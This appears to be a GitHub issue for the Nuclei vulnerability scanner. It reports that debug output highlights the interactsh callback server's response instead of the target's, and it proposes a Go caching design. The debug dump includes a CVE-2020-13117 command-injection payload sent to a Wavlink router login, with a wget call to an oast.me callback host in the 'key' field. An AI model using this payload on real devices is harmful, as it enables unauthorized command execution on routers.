Highlighting issue with interactsh matcher
Nuclei version:
Nuclei Engine 2.7.0
- [ ] Highlight correct matched section
- [ ] Do not highlight unrelated / unmatched section
Current Behavior:
The status code of the Interactsh Server's response is currently highlighted rather than the target server's. When the Interactsh Server is used in the matcher, even the word is not highlighted, as the highlighting module is looking for the word in the Interactsh Server's response.
Expected Behavior:
Rather than the Interactsh Server's response, the highlighting should work on the target's response.
Steps To Reproduce:
- Run nuclei-template on any host with Interactsh matcher
Debug Data
POST /cgi-bin/login.cgi HTTP/1.1
Host: <redacted>
newUI=1&page=login&username=admin&langChange=0&ipaddr=<redacted>&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2Fca0dvhdcefo1rrgm0ts0qg6417zd1boz9.oast.me%3B%60%3B%23&password=asd&lang_select=en
[DBG] [CVE-2020-13117] Dumped HTTP response http://<redacted>:80/cgi-bin/login.cgi
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: no-cache
Content-Type: text/html
Date: Thu, 15 Jan 1970 04:03:04 GMT
Pragma: no-cache
Server: lighttpd/1.4.20
<html><head><script language="JavaScript">parent.location.replace("http://wifi.wavlink.com/login.shtml?login=0");</script></head></html>
[ca0dvhdcefo1rrgm0ts0qg6417zd1boz9] Received HTTP interaction from <redacted> at 2022-05-15 11:11:03
------------
HTTP Request
------------
GET / HTTP/1.1
Host: ca0dvhdcefo1rrgm0ts0qg6417zd1boz9.oast.me
Connection: close
Connection: close
User-Agent: Wget
------------
HTTP Response
------------
+HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=utf-8
Server: oast.me
<html><head></head><body>9zob1dz7146gq0st0mgrr1ofecdhvd0ac</body></html>
[2022-05-15 16:41:07] [CVE-2020-13117:word-1] [http] [critical] http://<redacted>:80/cgi-bin/login.cgi
[2022-05-15 16:41:07] [CVE-2020-13117:word-2] [http] [critical] http://<redacted>:80/cgi-bin/login.cgi
[2022-05-15 16:41:07] [CVE-2020-13117:status-3] [http] [critical] http://<redacted>:80/cgi-bin/login.cgi
After investigation, the problem with highlighting the response body is that the HTTP module does not have access to the result event while printing the response dump. The interactsh module keeps the events in a cache and only upon getting a hit prints the interactsh debug event, while the HTTP dump has already been printed.
So moving the HTTP debugging to interactsh is not an option. One thing we can do is also print a highlighted response in the interactsh module after receiving an interaction. Any other ideas are also appreciated! Meanwhile, putting this issue on hold.
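As an added example of the design the comment above proposes (this is illustrative code, not nuclei's own): the HTTP side stores the target's response dump together with the matcher's words and expected status code under the interactsh correlation id, and when the interaction arrives the cached target dump is the one that gets highlighted, never the interaction's own body. The type and function names (InteractionCache, HighlightWords, HighlightStatus), the ANSI markers and the sample dump are assumptions constructed for the example.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
	"sync"
)

// ANSI markers used to wrap a matched span (constructed for this example).
const (
	hlStart = "\x1b[1;31m"
	hlEnd   = "\x1b[0m"
)

// pendingResponse is what the HTTP side hands over before the callback arrives:
// the target's own response dump plus what the template's matchers look for.
type pendingResponse struct {
	TargetDump string
	Words      []string
	Status     int
}

// InteractionCache (hypothetical name) keeps target responses keyed by the
// interactsh correlation id until an interaction for that id is reported.
type InteractionCache struct {
	mu      sync.Mutex
	pending map[string]pendingResponse
}

func NewInteractionCache() *InteractionCache {
	return &InteractionCache{pending: make(map[string]pendingResponse)}
}

// Store is called at request time, when the target dump is already known but
// no interaction has happened yet.
func (c *InteractionCache) Store(id, targetDump string, words []string, status int) {
	c.mu.Lock()
	defer c.mu.Unlock()
	c.pending[id] = pendingResponse{TargetDump: targetDump, Words: words, Status: status}
}

// HighlightWords wraps each case-insensitive occurrence of any word in text.
// A single left-to-right pass picks the earliest match at every position, so
// a later word can never match inside a marker inserted for an earlier one.
// Words are assumed to be ASCII, so lowercasing keeps byte offsets aligned.
func HighlightWords(text string, words []string) string {
	lower := strings.ToLower(text)
	var b strings.Builder
	i := 0
	for i < len(text) {
		best, bestLen := -1, 0
		for _, w := range words {
			lw := strings.ToLower(w)
			if lw == "" {
				continue
			}
			if j := strings.Index(lower[i:], lw); j >= 0 && (best < 0 || j < best) {
				best, bestLen = j, len(lw)
			}
		}
		if best < 0 {
			b.WriteString(text[i:])
			break
		}
		b.WriteString(text[i : i+best])
		b.WriteString(hlStart)
		b.WriteString(text[i+best : i+best+bestLen])
		b.WriteString(hlEnd)
		i += best + bestLen
	}
	return b.String()
}

// HighlightStatus wraps the status code on the dump's first line (for example
// "HTTP/1.1 200 OK") when it equals the expected code; otherwise the dump is
// returned unchanged.
func HighlightStatus(dump string, status int) string {
	end := strings.IndexAny(dump, "\r\n")
	if end < 0 {
		end = len(dump)
	}
	line, rest := dump[:end], dump[end:]
	want := " " + strconv.Itoa(status)
	if i := strings.Index(line, want); i >= 0 {
		after := i + len(want)
		if after == len(line) || line[after] == ' ' {
			line = line[:i+1] + hlStart + line[i+1:after] + hlEnd + line[after:]
		}
	}
	return line + rest
}

// OnInteraction is called by the callback side with the correlation id of the
// interaction it just received. It highlights the cached target dump only; the
// interaction's own body is never searched. The entry is consumed so a second
// interaction for the same id cannot reprint it.
func (c *InteractionCache) OnInteraction(id string) (string, bool) {
	c.mu.Lock()
	p, ok := c.pending[id]
	delete(c.pending, id)
	c.mu.Unlock()
	if !ok {
		return "", false
	}
	out := HighlightWords(p.TargetDump, p.Words)
	return HighlightStatus(out, p.Status), true
}

func main() {
	// Constructed sample: a target dump, a matcher word expected in the body,
	// an expected status of 200, and a placeholder correlation id.
	c := NewInteractionCache()
	target := "HTTP/1.1 200 OK\r\nServer: lighttpd/1.4.20\r\n\r\n<html>login.shtml?login=0</html>"
	c.Store("example-correlation-id", target, []string{"login=0"}, 200)
	if out, ok := c.OnInteraction("example-correlation-id"); ok {
		fmt.Println(out)
	}
}
```

The split into Store and OnInteraction mirrors the timing problem described in the comment: the target dump exists before the interaction, so it has to be parked somewhere keyed by the correlation id, and the highlighting runs only once the hit is known.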
Considering the implementation complexity, I'm closing this as not planned for the time being.